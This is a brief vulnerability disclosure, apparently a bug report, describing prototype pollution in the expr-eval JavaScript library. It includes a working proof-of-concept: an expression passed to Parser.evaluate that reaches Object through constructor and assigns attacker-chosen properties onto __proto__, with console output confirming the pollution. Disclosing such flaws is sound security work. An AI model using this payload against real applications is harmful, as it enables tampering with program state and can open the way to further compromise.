With speficific input attckers can define properties on prototype, which will lead to prototype pollution.
Need node version>=12.0.0, which introduce Object.fromEntries
// PoC.js
const { Parser } = require('expr-eval');
const o = {};
console.log("o.a=", o.a); // o.a= undefined
const res = Parser.evaluate('Object=constructor;a=Object.fromEntries([["a","polluted"]]);Object.assign(__proto__, a)');
console.log("o.a=", o.a); // o.a= polluted
This vulnerability is capable of make a prototype pollution